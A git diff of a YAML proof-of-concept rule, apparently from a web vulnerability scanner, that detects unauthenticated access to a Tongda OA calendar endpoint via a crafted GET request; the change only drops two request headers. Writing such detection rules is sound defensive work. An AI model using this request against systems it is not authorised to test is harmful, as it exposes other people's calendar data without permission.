diff --git a/WebScan/pocs/tongda-meeting-unauthorized-access.yml b/WebScan/pocs/tongda-meeting-unauthorized-access.yml index dc8cfd1..c95a9e3 100644 --- a/WebScan/pocs/tongda-meeting-unauthorized-access.yml +++ b/WebScan/pocs/tongda-meeting-unauthorized-access.yml @@ -3,9 +3,6 @@ rules: - method: GET path: >- /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay - headers: - User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36' - Accept-Encoding: 'deflate' follow_redirects: false expression: | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string("creator"))) && response.body.bcontains(bytes(string("originalTitle")))